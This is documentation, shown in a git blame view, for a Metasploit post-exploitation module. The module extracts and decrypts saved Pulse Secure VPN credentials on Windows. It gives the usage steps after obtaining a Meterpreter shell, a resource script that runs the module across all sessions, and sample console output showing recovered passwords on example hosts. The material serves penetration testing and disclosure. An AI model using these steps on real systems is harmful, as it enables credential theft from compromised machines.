adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3da170a43c7f288fe9bc88fe325da488733acac3
metasploit-gs/documentation/modules/post/windows/gather/credentials/pulse_secure.md
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

189 lines
5.9 KiB
Markdown
Raw Normal View History

Pulse Secure client credentials extraction and decryption post module.
2019-02-04 16:07:57 +01:00
## Vulnerable Application
Add in fixes from review
2020-11-24 12:08:51 -06:00
Pulse Secure VPN Client for versions 9.1 prior to 9.1R4 and 9.0 prior to 9.0R5.
Pulse Secure client credentials extraction and decryption post module.
2019-02-04 16:07:57 +01:00
Add in fixes from review
2020-11-24 12:08:51 -06:00
An end-to-end setup with working Juniper Pulse Secure VPN server, Pulse Secure client on
Microsoft Windows, and valid credentials are required for Pulse Secure client to save
credentials locally and therefore test this.
Pulse Secure client credentials extraction and decryption post module.
2019-02-04 16:07:57 +01:00
## Verification Steps
Add in fixes from review
2020-11-24 12:08:51 -06:00
1. Get a Meterpreter shell on a Windows machine that has Pulse Secure client installed.
Pulse Secure client credentials extraction and decryption post module.
2019-02-04 16:07:57 +01:00
2. Load the module: `use post/windows/gather/credentials/pulse_secure`
Add in fixes from review
2020-11-24 12:08:51 -06:00
3. Set the correct session on the module: `set SESSION *session id*`
4. Run the module with `run` and enjoy the loot.
Pulse Secure client credentials extraction and decryption post module.
2019-02-04 16:07:57 +01:00
Add in fixes from review
2020-11-24 12:08:51 -06:00
## Scenarios
Fix documentation.
2020-10-27 20:33:01 +01:00
Update documentation with scenarios of each branch (9.0.x, 9.1.x) running on Windows 10 with different privileges (unprivileged user, system) where applicable.
2020-11-27 17:15:19 +01:00
The command for all scenarios is the same:
Pulse Secure client credentials extraction and decryption post module.
2019-02-04 16:07:57 +01:00
```
msf > use post/windows/gather/credentials/pulse_secure
msf > set SESSION 1
msf > run
```
Update documentation with scenarios of each branch (9.0.x, 9.1.x) running on Windows 10 with different privileges (unprivileged user, system) where applicable.
2020-11-27 17:15:19 +01:00
If you wish to run the post module against all sessions from framework, here is how:
Pulse Secure client credentials extraction and decryption post module.
2019-02-04 16:07:57 +01:00
Update documentation with scenarios of each branch (9.0.x, 9.1.x) running on Windows 10 with different privileges (unprivileged user, system) where applicable.
2020-11-27 17:15:19 +01:00
1. Create the following resource script:
```
framework.sessions.each_pair do |sid, session|
run_single("use post/windows/gather/credentials/pulse_secure")
run_single("set SESSION #{sid}")
run_single("run")
end
Pulse Secure client credentials extraction and decryption post module.
2019-02-04 16:07:57 +01:00
```
Update documentation with scenarios of each branch (9.0.x, 9.1.x) running on Windows 10 with different privileges (unprivileged user, system) where applicable.
2020-11-27 17:15:19 +01:00
2. At the msf prompt, execute the above resource script:
`msf > resource path-to-resource-script`
### Pulse Secure 9.0.4 on Microsoft Windows 10 Enterprise 19042
```
msf6 post(windows/gather/credentials/pulse_secure) > run
[*] Target is running Pulse Secure Connect build 9.0.4.1731.
[+] This version is considered vulnerable.
[*] Running credentials acquisition.
[+] Account found
[*] Username:
[*] Password: John2020!!
[*] URI: https://vpn.contoso.local
[*] Name: Contoso VPN
[*] Source: user
[*] Post module execution completed
```
### Pulse Secure 9.0.5 on Microsoft Windows 10 Enterprise 19042
With leftovers from previously installed version (9.0.4):
```
msf6 post(windows/gather/credentials/pulse_secure) > run
[*] Target is running Pulse Secure Connect build 9.0.5.1907.
[!] You're executing from an unprivileged process so this version is considered safe.
[!] However, there might be leftovers from previous versions in the registry.
[!] We recommend running this script in elevated mode to obtain credentials saved by recent versions.
[*] Running credentials acquisition.
[+] Account found
Pulse Secure client credentials extraction and decryption post module.
2019-02-04 16:07:57 +01:00
[*] Username:
Update documentation with scenarios of each branch (9.0.x, 9.1.x) running on Windows 10 with different privileges (unprivileged user, system) where applicable.
2020-11-27 17:15:19 +01:00
[*] Password: John2020!!
[*] URI: https://vpn.contoso.local
[*] Name: Contoso VPN
[*] Source: user
[*] Post module execution completed
```
Without any leftovers from previously installed versions:
```
msf6 post(windows/gather/credentials/pulse_secure) > run
[*] Target is running Pulse Secure Connect build 9.0.5.1907.
[!] You're executing from an unprivileged process so this version is considered safe.
[!] However, there might be leftovers from previous versions in the registry.
[!] We recommend running this script in elevated mode to obtain credentials saved by recent versions.
[*] Running credentials acquisition.
[*] Post module execution completed
```
### Pulse Secure 9.0.5 on Microsoft Windows 10 Enterprise 19042 (Elevated)
```
msf6 post(windows/gather/credentials/pulse_secure) > run
[*] Target is running Pulse Secure Connect build 9.0.5.1907.
[+] You're executing from a privileged process so this version is considered vulnerable.
[*] Running credentials acquisition.
[+] Account found
[*] Username: john.doe@contoso.local
[*] Password: John2020!!
[*] URI: https://vpn.contoso.local
[*] Name: Contoso VPN
Pulse Secure client credentials extraction and decryption post module.
2019-02-04 16:07:57 +01:00
[*] Source: user
Update documentation with scenarios of each branch (9.0.x, 9.1.x) running on Windows 10 with different privileges (unprivileged user, system) where applicable.
2020-11-27 17:15:19 +01:00
[*] Post module execution completed
```
### Pulse Secure 9.1.3 on Microsoft Windows 10 Enterprise 19042
```
msf6 post(windows/gather/credentials/pulse_secure) > run
[*] Target is running Pulse Secure Connect build 9.1.3.1313.
[+] This version is considered vulnerable.
[*] Running credentials acquisition.
[+] Account found
Pulse Secure client credentials extraction and decryption post module.
2019-02-04 16:07:57 +01:00
[*] Username:
Update documentation with scenarios of each branch (9.0.x, 9.1.x) running on Windows 10 with different privileges (unprivileged user, system) where applicable.
2020-11-27 17:15:19 +01:00
[*] Password: John2020!!
[*] URI: https://vpn.contoso.local
[*] Name: Contoso VPN
Pulse Secure client credentials extraction and decryption post module.
2019-02-04 16:07:57 +01:00
[*] Source: user
[*] Post module execution completed
```
Update documentation with scenarios of each branch (9.0.x, 9.1.x) running on Windows 10 with different privileges (unprivileged user, system) where applicable.
2020-11-27 17:15:19 +01:00
### Pulse Secure 9.1.4 on Microsoft Windows 10 Enterprise 19042
With leftovers from previously installed version (9.1.3):
Pulse Secure client credentials extraction and decryption post module.
2019-02-04 16:07:57 +01:00
```
Update documentation with scenarios of each branch (9.0.x, 9.1.x) running on Windows 10 with different privileges (unprivileged user, system) where applicable.
2020-11-27 17:15:19 +01:00
msf6 post(windows/gather/credentials/pulse_secure) > run
[*] Target is running Pulse Secure Connect build 9.1.4.1955.
[!] You're executing from an unprivileged process so this version is considered safe.
[!] However, there might be leftovers from previous versions in the registry.
[!] We recommend running this script in elevated mode to obtain credentials saved by recent versions.
[*] Running credentials acquisition.
[+] Account found
[*] Username:
[*] Password: John2020!!
[*] URI: https://vpn.contoso.local
[*] Name: Contoso VPN
[*] Source: user
[*] Post module execution completed
```
Without leftovers:
```
msf6 post(windows/gather/credentials/pulse_secure) > run
[*] Target is running Pulse Secure Connect build 9.1.4.1955.
[!] You're executing from an unprivileged process so this version is considered safe.
[!] However, there might be leftovers from previous versions in the registry.
[!] We recommend running this script in elevated mode to obtain credentials saved by recent versions.
[*] Running credentials acquisition.
[*] Post module execution completed
```
### Pulse Secure 9.1.4 on Microsoft Windows 10 Enterprise 19042 (Elevated)
```
msf6 post(windows/gather/credentials/pulse_secure) > run
[*] Target is running Pulse Secure Connect build 9.1.4.1955.
[+] You're executing from a privileged process so this version is considered vulnerable.
[*] Running credentials acquisition.
[+] Account found
[*] Username: john.doe@contoso.local
[*] Password: John2020!!
[*] URI: https://vpn.contoso.local
[*] Name: Contoso VPN
[*] Source: user
[*] Post module execution completed
```
### Host without Pulse Secure
```
msf6 post(windows/gather/credentials/pulse_secure) > run
[-] Pulse Secure Connect client is not installed on this system
[*] Post module execution completed
Pulse Secure client credentials extraction and decryption post module.
2019-02-04 16:07:57 +01:00
```
## References
Fix documentation.
2020-10-27 20:33:01 +01:00
- https://qkaiser.github.io/reversing/2020/10/27/pule-secure-credentials
- https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601
Reference in New Issue Copy Permalink